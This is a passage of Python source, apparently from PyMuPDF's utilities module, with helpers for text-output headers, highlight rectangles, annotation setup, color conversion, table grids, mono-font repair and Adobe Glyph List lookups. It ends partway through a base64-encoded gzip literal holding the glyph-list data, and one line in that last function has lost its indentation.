        raise ValueError("bad argument 'img'")
    return TOOLS.image_profile(stream)
def ConversionHeader(i: str, filename: OptStr ="unknown"):
    """Return the leading boilerplate for a get_text output format.

    Args:
        i: format name - "html", "json", "xml" or "xhtml" (case-insensitive);
           any other value selects plain text, whose header is empty.
        filename: document name embedded in the xml and json headers.
    """
    t = i.lower()
    # The multi-line literals below intentionally start at column 0 so the
    # emitted markup carries no spurious indentation.
    html = """<!DOCTYPE html>
<html>
<head>
<style>
body{background-color:gray}
div{position:relative;background-color:white;margin:1em auto}
p{position:absolute;margin:0}
img{position:absolute}
</style>
</head>
<body>\n"""
    xml = (
        """<?xml version="1.0"?>
<document name="%s">\n"""
        % filename
    )
    xhtml = """<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>
body{background-color:gray}
div{background-color:white;margin:1em;padding:1em}
p{white-space:pre-wrap}
</style>
</head>
<body>\n"""
    text = ""
    json = '{"document": "%s", "pages": [\n' % filename
    if t == "html":
        r = html
    elif t == "json":
        r = json
    elif t == "xml":
        r = xml
    elif t == "xhtml":
        r = xhtml
    else:
        r = text
    return r
def ConversionTrailer(i: str):
    """Return the closing boilerplate for a get_text output format; plain
    text (and any unknown format) closes with an empty string.
    """
    html = "</body>\n</html>\n"
    trailers = {
        "html": html,
        "json": "]\n}",
        "xml": "</document>\n",
        "xhtml": html,  # xhtml shares the html trailer
    }
    return trailers.get(i.lower(), "")
class ElementPosition(object):
    """Lightweight attribute container for story element position info;
    attributes are assigned dynamically by the caller."""

    def __init__(self):
        pass

    def __str__(self):
        # render every attribute as " name=repr", in insertion order
        return "".join(f" {key}={value!r}" for key, value in self.__dict__.items())
def make_story_elpos():
    # Factory returning a fresh, empty ElementPosition container.
    return ElementPosition()
def get_highlight_selection(page, start: point_like =None, stop: point_like =None, clip: rect_like =None) -> list:
    """Return rectangles of text lines between two points.

    Notes:
        The default of 'start' is top-left of 'clip'. The default of 'stop'
        is bottom-right of 'clip'.
    Args:
        start: start point_like
        stop: end point_like, must be 'below' start
        clip: consider this rect_like only, default is page rectangle
    Returns:
        List of line bbox intersections with the area established by the
        parameters.
    """
    # validate and normalize arguments
    if clip is None:
        clip = page.rect
    clip = Rect(clip)
    if start is None:
        start = clip.tl
    if stop is None:
        stop = clip.br
    # restrict the clip to the vertical band between start and stop
    clip.y0 = start.y
    clip.y1 = stop.y
    if clip.is_empty or clip.is_infinite:
        return []
    # extract text of page, clip only, no images, expand ligatures
    blocks = page.get_text(
        "dict", flags=0, clip=clip,
    )["blocks"]
    lines = []  # will return this list of rectangles
    for b in blocks:
        bbox = Rect(b["bbox"])
        if bbox.is_infinite or bbox.is_empty:
            continue
        for line in b["lines"]:
            bbox = Rect(line["bbox"])
            if bbox.is_infinite or bbox.is_empty:
                continue
            lines.append(bbox)
    if lines == []:  # did not select anything
        return lines
    lines.sort(key=lambda bbox: bbox.y1)  # sort by vertical positions
    # cut off prefix from first line if start point is close to its top
    bboxf = lines.pop(0)
    if bboxf.y0 - start.y <= 0.1 * bboxf.height:  # close enough?
        r = Rect(start.x, bboxf.y0, bboxf.br)  # intersection rectangle
        if not (r.is_empty or r.is_infinite):
            lines.insert(0, r)  # insert again if not empty
    else:
        lines.insert(0, bboxf)  # insert again
    if lines == []:  # the list might have been emptied
        return lines
    # cut off suffix from last line if stop point is close to its bottom
    bboxl = lines.pop()
    if stop.y - bboxl.y1 <= 0.1 * bboxl.height:  # close enough?
        r = Rect(bboxl.tl, stop.x, bboxl.y1)  # intersection rectangle
        if not (r.is_empty or r.is_infinite):
            lines.append(r)  # append if not empty
    else:
        lines.append(bboxl)  # append again
    return lines
def annot_preprocess(page: "Page") -> int:
    """Prepare for annotation insertion on the page.

    Validates that the page belongs to a PDF and temporarily resets any
    page rotation to 0 (annotation geometry is computed unrotated).

    Returns:
        Old page rotation value, to be restored by the caller afterwards.
    """
    CheckParent(page)
    if not page.parent.is_pdf:
        raise ValueError("is no PDF")
    rot = page.rotation
    if rot:  # remove rotation while inserting
        page.set_rotation(0)
    return rot
def annot_postprocess(page: "Page", annot: "Annot") -> None:
    """Clean up after annotation insertion.

    Set ownership flag and store annotation in page annotation dictionary.
    """
    # weak proxy avoids a reference cycle between page and annotation
    annot.parent = weakref.proxy(page)
    # register in the page's annotation registry, keyed by object id
    page._annot_refs[id(annot)] = annot
    # the Python object owns the underlying resource
    annot.thisown = True
def sRGB_to_rgb(srgb: int) -> tuple:
    """Convert sRGB color code to an RGB color triple.

    There is **no error checking** for performance reasons!

    Args:
        srgb: (int) RRGGBB (red, green, blue), each color in range(255).
    Returns:
        Tuple (red, green, blue) each item in intervall 0 <= item <= 255.
    """
    # extract the three 8-bit components by shifting / masking
    return (srgb >> 16, (srgb >> 8) & 0xFF, srgb & 0xFF)
def sRGB_to_pdf(srgb: int) -> tuple:
    """Convert sRGB color code to a PDF color triple.

    There is **no error checking** for performance reasons!

    Args:
        srgb: (int) RRGGBB (red, green, blue), each color in range(255).
    Returns:
        Tuple (red, green, blue) each item in intervall 0 <= item <= 1.
    """
    red, green, blue = sRGB_to_rgb(srgb)
    # scale each 0..255 component into the PDF 0..1 range
    return red / 255.0, green / 255.0, blue / 255.0
def make_table(rect: rect_like =(0, 0, 1, 1), cols: int =1, rows: int =1) -> list:
    """Return a list of (rows x cols) equal sized rectangles.

    Notes:
        A utility to fill a given area with table cells of equal size.
    Args:
        rect: rect_like to use as the table area
        rows: number of rows
        cols: number of columns
    Returns:
        A list with <rows> items, where each item is a list of <cols>
        PyMuPDF Rect objects of equal sizes.
    """
    area = Rect(rect)  # ensure this is a Rect
    if area.is_empty or area.is_infinite:
        raise ValueError("rect must be finite and not empty")
    cell_width = area.width / cols  # width of one table cell
    cell_height = area.height / rows  # height of one table cell
    shift_right = (cell_width, 0, cell_width, 0)  # offset to next column
    shift_down = (0, cell_height, 0, cell_height)  # offset to next row
    corner = area.tl
    cell = Rect(corner, corner.x + cell_width, corner.y + cell_height)

    # build the first row by repeatedly shifting the cell to the right
    row = [cell]
    for _ in range(1, cols):
        cell = cell + shift_right
        row.append(cell)

    # each further row is the previous one shifted downwards
    grid = [row]
    for j in range(1, rows):
        grid.append([c + shift_down for c in grid[j - 1]])
    return grid
def repair_mono_font(page: "Page", font: "Font") -> None:
    """Repair character spacing for mono fonts.

    Notes:
        Some mono-spaced fonts are displayed with a too large character
        width, e.g. "a b c" instead of "abc". This utility adds an entry
        "/DW w" to the descendent font of font. The int w is
        taken to be the first width > 0 of the font's unicodes.
        This should enforce viewers to use 'w' as the character width.
    Args:
        page: fitz.Page object.
        font: fitz.Font object.
    """
    def set_font_width(doc, xref, width):
        # Set "/DW width" on the descendant font of the font at 'xref'
        # and remove any individual widths array "/W".
        # Returns False when there is no descendant font array.
        df = doc.xref_get_key(xref, "DescendantFonts")
        if df[0] != "array":
            return False
        # extract the descendant font's xref from "[n 0 R]"
        df_xref = int(df[1][1:-1].replace("0 R",""))
        W = doc.xref_get_key(df_xref, "W")
        if W[1] != "null":  # remove individual widths, they conflict with /DW
            doc.xref_set_key(df_xref, "W", "null")
        doc.xref_set_key(df_xref, "DW", str(width))
        return True

    if not font.flags["mono"]:  # font not flagged as monospaced
        return None
    doc = page.parent  # the document
    fontlist = page.get_fonts()  # list of fonts on page
    xrefs = [  # list of objects referring to font
        f[0]
        for f in fontlist
        if (f[3] == font.name and f[4].startswith("F") and f[5].startswith("Identity"))
    ]
    if xrefs == []:  # our font does not occur
        return
    xrefs = set(xrefs)  # drop any double counts
    # derive the width from the widest of the first few valid codepoints
    maxadv = max([font.glyph_advance(cp) for cp in font.valid_codepoints()[:3]])
    width = int(round((maxadv * 1000)))  # PDF expects glyph space units
    for xref in xrefs:
        if not set_font_width(doc, xref, width):
            print("Cannot set width for '%s' in xref %i" % (font.name, xref))
# Adobe Glyph List functions
import base64, gzip
# Lazily filled caches: codepoint -> glyph name, and glyph name -> codepoint.
# Both are populated on first use from the embedded Adobe Glyph List data.
_adobe_glyphs = {}
_adobe_unicodes = {}
def unicode_to_glyph_name(ch: int) -> str:
    """Return the Adobe glyph name for a unicode codepoint.

    The mapping is built lazily on first call from the embedded
    Adobe Glyph List; unknown codepoints map to ".notdef".
    """
    if not _adobe_glyphs:  # fill the cache on first use
        for row in _get_glyph_text():
            if row.startswith("#"):  # comment line
                continue
            gname, codes = row.split(";")
            # a glyph name may map to several codepoints
            for code in codes.split():
                _adobe_glyphs[int(code[:4], base=16)] = gname
    return _adobe_glyphs.get(ch, ".notdef")
def glyph_name_to_unicode(name: str) -> int:
    """Return the unicode codepoint for an Adobe glyph name.

    The mapping is built lazily on first call from the embedded
    Adobe Glyph List; unknown names map to 65533 (replacement char).
    """
    if not _adobe_unicodes:  # fill the cache on first use
        for row in _get_glyph_text():
            if row.startswith("#"):  # comment line
                continue
            gname, codes = row.split(";")
            _adobe_unicodes[gname] = int(codes[:4], base=16)
    return _adobe_unicodes.get(name, 65533)
def adobe_glyph_names() -> tuple:
    """Return all glyph names of the Adobe Glyph List as a tuple."""
    if not _adobe_unicodes:  # fill the cache on first use
        for row in _get_glyph_text():
            if row.startswith("#"):  # comment line
                continue
            gname, codes = row.split(";")
            _adobe_unicodes[gname] = int(codes[:4], base=16)
    return tuple(_adobe_unicodes.keys())
def adobe_glyph_unicodes() -> tuple:
    """Return all unicode codepoints of the Adobe Glyph List as a tuple."""
    if not _adobe_unicodes:  # fill the cache on first use
        for row in _get_glyph_text():
            if row.startswith("#"):  # comment line
                continue
            gname, codes = row.split(";")
            _adobe_unicodes[gname] = int(codes[:4], base=16)
    return tuple(_adobe_unicodes.values())
def _get_glyph_text() -> bytes:
return gzip.decompress(base64.b64decode(
b'H4sIABmRaF8C/7W9SZfjRpI1useviPP15utzqroJgBjYWhEkKGWVlKnOoapVO0YQEYSCJE'
b'IcMhT569+9Ppibg8xevHdeSpmEXfPBfDZ3N3f/t7u//r//k/zb3WJ4eTv2T9vzXTaZZH/N'
b'Junsbr4Z7ru7/7s9n1/+6z//8/X19T/WRP7jYdj/57//R/Jv8Pax2/Sn87G/v5z74XC3Pm'
b'zuLqfurj/cnYbL8aEzyH1/WB/f7h6H4/70l7vX/ry9G47wzK/hcr7bD5v+sX9YM4i/3K2P'
b'3d1Ld9z353O3uXs5Dl/7DT7O2/UZ/3Tw9zjsdsNrf3i6exgOm57eTsbbvjv/1w2xTnfDo5'
b'fnYdjA3eV0vjt25zXkRJB36/vhKwN+kEw4DOf+ofsLuP3pboewGISO7bAxPkUU+EaUD7t1'
b'v++O/3FTCESmcsILgQRuLhDs/w857lz6NsPDZd8dzmtfSP85HO8GcI53+/W5O/br3QkeJa'
b'9NERmPKgE2Ue+73vgj97Ded5TH1pPDEFCT4/35RFFtAMORMezXb3dwiioCsYe77rABjjCO'
b'jHs/nLs7mx3wuYFYX+HsEQyTfHg/DY/nVxa0rzmnl+6BVQfeegTyemSlOdjqczqJ0J9/ev'
b'fp7tOH1ed/zj+2d/j+9eOHf7xbtsu75jcw27vFh19/+/jux58+3/304edl+/HT3fz9kq3i'
b'w/vPH981Xz5/APR/5p/g9/+Qhb+/3bX/8+vH9tOnuw8f79798uvP7xAcwv84f//5XfvpL/'
b'D97v3i5y/Ld+9//Msdgrh7/+Hz3c/vfnn3GQ4/f/iLifja492HFbz+0n5c/ARg3rz7+d3n'
b'30ycq3ef3zO+FSKc3/06//j53eLLz/OPd79++fjrh0/tHRIHr8t3nxY/z9/90i7/AxIg1r'
b'v2H+37z3effpr//PPN1CIF47Q2LUSdNz+3NjakdvnuY7v4/BcEGb4WyEPI+DMT++nXdvEO'
b'n8iWFomaf/ztL8wZhPqp/e8vcAbm3XL+y/xHpPH/xlnDejXKHJTQ4svH9hdK/mF19+lL8+'
b'nzu89fPrd3P374sDSZ/qn9+I93i/bTD/D+8wcWxOruy6f2L4jl89xEjkCQaZ9+4Hfz5dM7'
b'k33v3n9uP3788uvndx/e/zu8/vThn8ggSDqH56XJ6Q/vTZKRVx8+/sZgmRemIP5y98+fWu'
b'Ao8vc+z+bMjE/Iu8Vn7RBxIis/q7TevW9//Pndj+37RWuz/AND+ue7T+2/o+zefaKTdzbq'
b'f84R7xeTdJYYJLOf7z4xq11N/osp2bt3q7v58h/vKLxzjtrw6Z2rOSbzFj+5rEd7+P84UL'
b'xH8/6vO/lj2/6Pu7eX7d3P6C3Y2tb3u+7ua3dkA/yvu+w/JqyV6GeUt0/dy7nb36MjySZ/'
b'MUMO3Hz5+LNycsdx54SB5wmN/XJvRh0z/vz1/PaCf4Zhd/rP9dPur/j7eDDtfIV+dX3+r7'
b'vz63B36vb9w7AbDn/ddLseown7kr7bbU4YIhD6/03//e7JiM0O669/vbyg1/hPdKLd8WGN'
b'PmnXoSs52h5200OGk/WW/fvdl0NvhpHTw3q3Pt59Xe8uCOARA8ydCcX433Z/rjfonfbrnf'
b'hP5j9MJtM0mbf4XZT4XT9czt0Pk3S1ALFfPxyHA6g2A3WCz90Pq6qFO+dsskjdtzAB3B+7'
b'rwwDeWi/reu0nbcOeMBostv1Dz9MpsuJwzbD+b5DcuGuKR32dFx/pcfGO9oOw7MZlAj64M'
b'/9bmOAaTJ/WFuJF0t898eHXfdDNmV4JC77x133J8XONCDiTTWq5JkvNMMLNY9C1ZLNa82R'
b'rIki9ULP50AZ/6pczOyn92DSE3IqRSZs7nc2+gmqKMi+O3an/sQkTQOpszcLsBTnsg2gSE'
b'f/KskTQ4YaANrFPFn4b/ELIEo/Iu2jQkbg/QEtEJXe1Y6MtWP3sl3/MMlnqf08D4cBaclr'
b'5KzEzHTuyXhZPyCXVhkcD0/DoXsmEwEfoWVQqsJ+Sg2eW9qniOGQFqHh3n+XCNMWCMLJ3b'
b'c4BPB2vz5CYenXkKjI06Rhu8mSJlSxKmmQX+uHB6g1jC0ztEQ+TRqdISmC6A46TLiH/sfM'
b'wBczE0mo4WrXHzoJpUyaKCvglLnpJC1XiEWSBN55eIHcDChLFpQ4TxZrHWkL2mUXwl6Yto'
b'N6OLefEmyRLHy7mizwDT1yt1szryqhfCOa1AJJBtKVZFRtCd8WU3pATvFrbr5cHlo6Dome'
b'tzoF0xmAbn3/vF2fgKgcbhbkKCCrCKBYETp0uZt+2siJ5pSGc92+kOVgbLVIOREE/rw+jc'
b'JfNGSxGWBysYMmOzxrCU3qelSBOUV1VQCf456kXEGaqB4gykGJUKTJQupBnixZ9NNk+S+2'
b'ihS/0kkCjOoD6ccjhCO3niVLKfYW367Y0xY90TIU6MwSVkRfVdMM6HFYsxzpPGobc0NLrV'
b'4ky6htQIoOA9rLmWTeIupuh6aRZaij5vPp2LH15zO49PmEMH1niBrcCCWd60KgH00/Bmgp'
b'kM8t9NzL/mm930scS/j7XYuHlr2MGiXkiwoDQvnESoFVyfKEarx1uSGFA7ehkULobywiRP'
b'BNiqgAcbOCo9MFRwtGp1GVn6wSDuzTImllwJ65b2mcAPyAjZxvfcTpHN+2xC0bZboApKt6'
b'joBDPZhbIgyyEeD7B7Sx9kZ1qTWqKgeUkvZ66MUI1N4eejGytzeG3kgUP/QumFyVWyD1+E'
b'pSja9NICVYYqbrSkvzJV2Xo0WhQfIedV+EsGU0rd23hAogyuUKtNZ7kBjOxTEPBT9LS/Cv'
b'BlfE32OqDgVzo+JFfWt3uqkhATv4OEhYCFtGXrRhR/jCY7Is4kuCVWavQ0QdiVoDqoiute'
b'kS9K0eFjpDy3E8nc75EdVjKGbtgVmg+1KkWtQAVp/hpaPQM1SNl1O/YwryWeEJUS3gUkeb'
b'wTnzDLP+DdtgG0jtClLrXh86SHu6mQoIb1r5HM1KWjmksEN7xQ9VsjVpEQ1ezvA7gUqMD+'
b'97RcpruAv3Le0G8V2Oww/ZBDpq+40xQxPBh2/G6D1BqRSiKq7YJ5TJKjTdJlnpDjptk1U0'
b'phVwrbvkabJy/S5Ut1UPnyELqgwIovM1Cm6jCoGgMDERdp6sJJ/K5EeKViU/Nqc/Lutj90'
b'OeYwD8UVS6Kb7RNzMrc/sZhqsZmYenfh3EnCc/StfWJj9KniAe0WFSKFE/hpxYWEK0k5TA'
b'wIh806Z72+hRd37UjZ50NJBBxu16o3UD+N1iHrjZ7LpRfab42+5KJ5gZH5eX8+WomxFq+Y'
b'++BBALJnWqVgGIRywArlFjJgefUXkgf/142NpPKQ84le/KfdtYs1kD2gjLDJ0mP7Hg6uSn'
b'tEb8P2TFYmW+p/xGo+B3kfK7SX7CQF4ZPE1++lUKGh3sT+tbAx3G5J/WN5WyDIzj5tQ/ae'
b'cZYrMDKqraT6b8fWshK2gxGcINBb+0hBQ8uuifpPuHY4SlmwhqwU+qg6frKFcRttbIphPQ'
b'R9WCwJesxfcF85bjZb9bX84siFWEiBYBh98kv1AF3jHTZ8k7PUvMVsm7v0F+TCjefdF4m7'
b'wTJWDpvmXIAeBbSrZI3on2gcBCFrWWCAN8BEhYRFXlK5N3elStQapRdRVIP8hQ0huaNirZ'
b'u6sBmN5NW8wn5kvaoqNFjZgn77qrpQeIFrXXInn3eFw/o62hZ8IU7Z2M0Qv3LREDiNQOJK'
b'vXQZEej8mQoT9th+NZO0TxyYCL+ukInW4UZFS14AO1SrX3Jnk36ByH4DIyMjMHO/jMzJfq'
b'MEsDhNLI0VCJyIAEUiopfEt7xzj2zk2XU9T0d9GQxPrzbdufT9GgMPWgrwuaWSZ/Y02eJ3'
b'+L5nZp8rdQ+VaWkPaJucrfok6uTv42mog1yd+ijEP4kpx58ndG2SR/V0NNkfz976E/WiZ/'
b'X99DZ3/uoxF+AtjV1Nx8q8JEqDd7qhkZYwUmB/byYoqG7OuuvwX63cnibJH8XQa0Gt8yoO'
b'UlKJ9v0JT/Ho9fZKuWgX7i7/FYPwUQLU2skr9vdTKh0/19q9UBhOgHI0gSjz0QU8+WUGx/'
b'jwoFJTAgF5SXemIhmYEhH066cZUEfEE2yc8syEXyM3s9aIU//4yuEtXlZ6815DN87+83Jq'
b'fh3OdavsR3yDVyJNdSS8STlByRjPISnlz/szJfgWNp8VoGUoZiqH8/969RViOG35kMcOJs'
b'RBqibJwnP0fZCI9+gol2Y79l3IBnya9F8gvza5n8oip+mfxihVqVUD7tt0yJVwRchW+TX0'
b'ImZckvekjEGPeLSjJ0nV+iejSdJr9EMkMGEQvfVHGMioqq/cuFhbVI3lPWNnlvynaevPdl'
b'Os2T974coS++D+WIye77IGJuibgc0dG8j8uRnqKkTA0tHsrkPSv4rnuk69kyeY+yEBW2Tt'
b'6bQmvwGxUa4tGFBv3ofZQBSNjwqnMI8UiOgOmXJJep+5Y5AQCTQ8vkA3NolXzARD8tMvxK'
b'qc+TD37AX+buWwIAACXpGM1y0I048Nbwi+C8ioAS+eBzH7J9YK7Bw8aPCTPIE8pgaglRG5'
b'YR4KsW6t2HmysAy1oz/LxzmWlUD8Vx8JLgCPXzKWgAH3T/jXRhfPKVrJgYUlSXBcigutDv'
b'rXxSsEROTCkjCMiMz1JUDQCnajBhkaqxAhD1zwXoPeodVNIPkQ7Skj6yUDBImU/J3LmllR'
b'BtZiHJ0IWlo6x0IfrsahmsVlVtHvWMEcFdKTzwLroNeugP8WICa2u8mMDA9t3T2iWOn7rb'
b'd1w/LmCKbejjcDnoalzNLX7uzzutF1ULh3v1BrV031vx8pkQwqZz3VrhQjV6CCNKFtuGJc'
b'J+CXy7FQn0rh9c3zxhZTbfMqVtHSDFTRe+D0CUduDXzrX6WJH2vUThvn0GM8sNoOYxU+9B'
b'4iuSX+EZWf+rFMw0+TU0X/B111iUya+R0rwCHaldcwA3p7hzeLXr2/ywCsMccRkI8fevR1'
b'3P8+RXnf9Qtn49Gac1P3QmkOOSg+//ZnLS5L9DEsrkv6OQwBT3afKR7rPkY6R7LkD7bmCa'
b'fPS9XVHjW8Ya5MXHEEsFIhpVyFb9RzoBqXOyNrRvkMU8kKIiFJAj1s4QiJqjgL0dmCdIRt'
b'jbKlcLknFrTJFEPRoVbfIxyhXwJVf8tw8E/ut0hJ0uLx2tXMBryuQTczFPPq24YzeZYHqP'
b'/hJU5qh0Sir31ITU1FM1qcJRufFXOiozVOV5JpTa+zO8mXdJnoncxM4YUpElI+VdlimozL'
b'ssycu8SxQaKC81OltQXuqS6cu81IUJxUtdVKS81MWSlJe6oJyZl7poQOXisiUlLlekxOWc'
b'lJe6YPqmIvWMlJe6pNRTL3XJtE+91IWhvNQlZZl6qUtKPfWylCyHqZelNPF5WUrmxFRkYe'
b'yFl6Wgv0JykPlZSA4yzwrJQaa9EFmQPmll/ls3EYqw3r/0vsvHAPTJN8XSf0ceSgdKS0BB'
b'qAaLzH7YvvITvb/51OsBtYVubaNDutDSa0vIXJTlGzX9jDU6kmtiaN/2WOU8GTmDt7gzhf'
b'jR+jzSF2+AVgT05AxBbB9iCIUVzdcQ+zZy0SB5236vlk6Rov7JrLTOUYD9nyIAqkHUa4A7'
b'PJ7Ha3DwLn0JXJwZlszn5slndhbT5POaSiyGgM92wQ6p+yzFCzQUHDLsc8j/mSVirR49/+'
b'e4/6WnKHfnhpZCWCSfow1iOL+5+Tunw1AEiL07n6KNW8i6dbv3NT7d0LbgJ/WxCRQp8ymD'
b'Lmlkh4SJqNWgXJIfzwyh4n/WvTemB5+jcoAIesERk97PUEgee6OwNwtDnXrW1npqiPPrQC'
b'Gr5POxg47h1WhiCDtKH5Sxz6d4Z7EB4gsY4b12O7XkD+brIFSafGFxF8kXmY7M3bfkBwA/'
b'uUCxfJHJRY5vKfa5JcJEotGA1INSoxID3aoUIWCl6aPufNEj9RSk0vQXgfQ+llXAJOYsYJ'
b'KCmcKU2cAkwC7WlMm5NtUpAihpoTxKk4e0MnuYuW9xC0Cr9JiefPGThJX99Gofpn9fRpME'
b'iqknCVB0v4wnCegqvkSThBZ0PElg9mpIZwTy7EpTgYxab6wgmGQIGvGX6zXS1oNK1a3oUj'
b'cRZKWo7Cwr2SacF55I2T8Jy+QM03p6298PO+nAcnEgi6lN6jG9ntqMwRuBTb2bwIuEkPkI'
b'0mhNnVI0/i/jheQJMd8ikR7MG9bcJdb9WBvga+MTlJGfv2MY+hLNJCoPSFWfJv9goy6Tf4'
b'T22ST/UHUHU5N/RBOFDHS02gEHrsdpwIuKCuFG2yd18g9JHHi+rmFK90+KUSX/9KLWWfLP'
b'INLCEjJSQ+5/qipSk1QjBKZq/1RJqOvkn77q15Pkn5GIiFNEqpL/oRh18j8h6mXyPzqmBU'
b'gd0zz5n2ikz+Ges5tZm/xPFA8ClXjq5DfGM0t+k6506b6lwRPQpY6x5bcgVWuJkCFl8luo'
b'sSljuOpuVsC06K2hpY+YJr9hHqA714bI5Va3h+B9hqLl/+aLP7efvktZQSi9wzEtQOu6Xo'
b'GOhkfonL9FuYYsklzDt68wFOByuu+fdAbNHXbLYGJB3q4/n3e6LkNREfiWrzr5F8tpnvwr'
b'Mq8qQfsRZ5aIGVa1dN8y/K8ASJE5whVZ2s4myb/sonPVmC9ReBztS2aWJf+KWmAF+ub2RE'
b'3GDa23BW7VGoi+7XRa5gTGO2qLlKiO0vi7Gafl3Ih0kfxLazqzafKvqGgRsxQtv/2uVFMk'
b'tEmEvrFe33cYbXZoTzM06bVvLC1Zm+4rnM0mxJ8uv6+P6zPczWtLH/eXZ65RzA1/v0Z3qc'
b'C8BXi8yML5JAf9dYD2QwU4RNq0Gncx5hGooqbre2Zlb87D7NfHZ121VxFXBYhhVScUyb8f'
b'Xob98Dj8kNN+ay2G2Ln7FkvnlQN0vqcO03ZLlcPEENs7igySfPBipgJRZAsZiZO6vJxYQl'
b'Q4TEXWNwyxC41qq+SlZoghdqXRyBB5pjlict0kvkZAczefJoKH/T2qelpZyFKT1FFDRLoS'
b'KJx3LtkMXCRBYzUABm0XwJQ+Qi7nyAG9pgzuZrN+VnWsIuTqKPJB6aFQ9G7OTfMAB70Rgu'
b'iMSw0ZlidBmxaBWh4WF5G73fNw7FDvcq7srrvgAZE89v2EO/g/QOzCkvVsmtL4aGrIdII+'
b'yFqqe7K2xs6enFlFwJHZxFrJeDK11p+ezOyevCdzu7ftyantXjxZ2A7Ok6XdhPdkZbfaPV'
b'nbzVpPzqwpnCPzibVj82RqzdY8mdmNAk/mdg3Uk1NrU+bJwhqLebK000xPVnYm4snaWgZ6'
b'cma3Wh05ndiJmCdTa9LsycxO/T2Z22m/J6fWLsaThR2kPVnaGbsnK2vw5snaGo94cmZtTB'
b'xZTKwxkidTayDrycxaH3kyt1aWnpxao1VPFtZaxJOlHeg9Wdk9fk/WdlPUkzO73ebIcmKn'
b'qJ5M7Ua0JzOrLnsyp8WNSFVOSYpUZeEarSMpVS4FWlKqXNJbUqpc0ltSqlxCrihVLiFXlK'
b'qQoCpKlUvyK+ZVLsmvmFe5JL8yUknyKyOVJL8yUknyKyOVJL8yUkn51kYqyY2aUuVSvjWl'
b'mkrya0o1FZlrSjWV5NeUairJrynVVJJfU6qpJL+mVFNJb02pppLeGaWaSnpnlGoq6Z0ZqS'
b'S9MyOVpHdmpJL0zoxUkt6ZkUrSOzNSSXpnlGomCZxRqsInEADJXEhTglMhKVVRCEmpilJI'
b'SlVUQlKqohaSUhUzISlVMReSUhWNkEYqn8A0NVL5FKWmdU9WQpZ2DuDJyppoerK2xjmORM'
b'ai8ovMJmMLCcpkbCnJNxlbBZIRVT75NbpNBFUJaUL26a2NVEub3gy5nE1cg8y5MDxx4mO4'
b'JWHLrqhyVs6ynAsJ4UvXrkGyVpTlRMicZCrklGQmZEEyF7IkORWyIlkIyYjKUsgZycqRU9'
b'aKsqyFNELOhKQYbnAhyZDdeEGSQWVeyCmLsswyIRlUlgvJBGZTIRlyVgjJBGalkExgJkKm'
b'TGAmQnKYLjMRksN0mc2FNFKJzJmRaiGkkWoppJGqFdJIJQnkMF3mEyEpVS7p5TBd5pJeDt'
b'NlLunlMF3mkl4O02Uu6eUwXeaSXg7TZS7p5TBd5pJeDtNlLunNjVSSXo6t5VSE5NhaTkVI'
b'jq3lVITk2FpORUiOreVUhGTrK6ciJOt5ORUh2dzKqUjFwbScilSFEUOkKowYUgqFEUNKoT'
b'BiSCkURgwphcKIIaXAwbQsJIEcTMtCEsjBtCwkgZURw+dkwZ6qnE+FZFBVKySDqkshGdSs'
b'FpIJnHsxClOfq5mQTFEtjk19nqVCMkXNXEgGtfRCFqYElz6fUQ+ohXrHJUuhaLyQJRNYLH'
b'yRoZ2DXE6EpONlKmRJMhOyIhn8MqjlVMgZSRGDWVcsSyFTkpWQGclayJzkTEgjlSShMlI1'
b'QhqpFkIaqZZCGqkkvZWRymd7ySG+aCW97EWLVtLLIb5oJb0c4otW0sshvmglvRzii1bSyy'
b'G+aCW9HOKLVtLL/rloJb0c4otW0jszUkl60T+vmiyQBUmf/Ap97KqZBpJc6UUrdm7FaiIk'
b'xVilQlKMlU9ghQ5q1Ug3UnGYKJqpkExvE7imIpVCMqJGxOAwUTS1kIyoqYRkehsvVc1hom'
b'gyIVkKTSokS6HJhaRUi+CYUi2CYyPGTEgjhq8bdW7i9XWjnpqIVkIyooWXasZONXN+yzRD'
b'B5WlTicHiSLLUjdBK9McXVCWujlXmRY04p9kCyGnJJdCFiRbR7LRYSh3jvO0NCOsczydcS'
b'qUUWa/kcHqqldniiRanAG57Y/rp/Vh/UPOk7jraNoPifuwMsL5Sa+XRiBU76bYnKrGR5UR'
b'dK9iNp5V1MbDeF2IXTpvUlnfMwwz0PSHRyA7h61ogQ4M/517jTZE990mAhcER7ZUTNKNlS'
b'aqVP14pWkagSoxdP28PuOvybd5Fsjtevf42m/O2x9WKy5ByDoAR5Fd9+i6THxJMqldgN6s'
b'n7rT1iwGvrJpWVdx6uvWgNv1/tvalFIIJB9xRh6ngW0WM4LHYsQZeawt24olwu/WyGyR1a'
b'VtzzWYkVjZiDMK3bOfT5fjWnxxLA9w7GU10bxxRVjlmjuqECubCS8oqpDPmc3SP7hIeQqo'
b'SdHLFg2Vfdxu1/1xWe9+yDJqDu64PXsdfdx+DlY4bg+mXm6lHrR/6Y6n9WHzAxdWAqmdTR'
b'TuV2eN22BPjyw7qFbIHD48aWBK4Hm7PjxvL+ftGhWWRlHAuHaYcVWFn/fH9cNzdza2uJgt'
b'1FeoN5lHxnEiq7jmCiN6ml3DytfUxWSiyPLMuba+QRuZuOxsrDDRgg/DGY575m2NNnG4bN'
b'bns1/Eo2J1uJy+sjTDYm0A/VpfQHS/BzRcdoACfVmj2ML684TIsTv8kPFAwPploFgv0Uo9'
b's1Bwu0rJ/v7lBbm6qlcrfh6H9cO2OyGXqSSS/lPqTa2B4Yi+74nFwWQZnJ1ht3sT9xDyuO'
b'7UQiLbPpEAoJ8/PiAnuRJocpWdj9nbTNvZnJi50YF6RnSjQ2NpOXmNqnk8Dq/3w5n1fTa1'
b'5GZ92m6GV9oeUI/xkC1NXmQhkCtRXm8i2OWFgAt5c79zgS+ngriwl7kgLujlRBAf8jITyA'
b'S89AHbMGZ5IF0gs1mAfChUqD32uu2RGRDRuUNZb4i79ecioAzQoVlATZgOzgN8eXGYS+cW'
b'Jf2t+xM1hPocES/fJJBIlUq2Q9x+TMYrWARHB3r0qeH6gsclNQ6TFGeKjgJdKQYE//r2Q1'
b'bNWgUyKierT4zBJSqXmWfeCmSrxFQQqREuH02hzVJPbEyhFYG8PzHIeS0ISuJ+PQJ9zpUa'
b'GB5dHVhIcJL4yiMis0OMTmAKBWGdHvrebm5wr7HVQLRf5jjeTLjStHZogzj2LzRg4+zQEv'
b'5Yhmnx9gio0rxSh2mtYoxp1YLLJife8HZ65mgyF2q9456JjKRUDT3nBoY+B60yS0No0WAU'
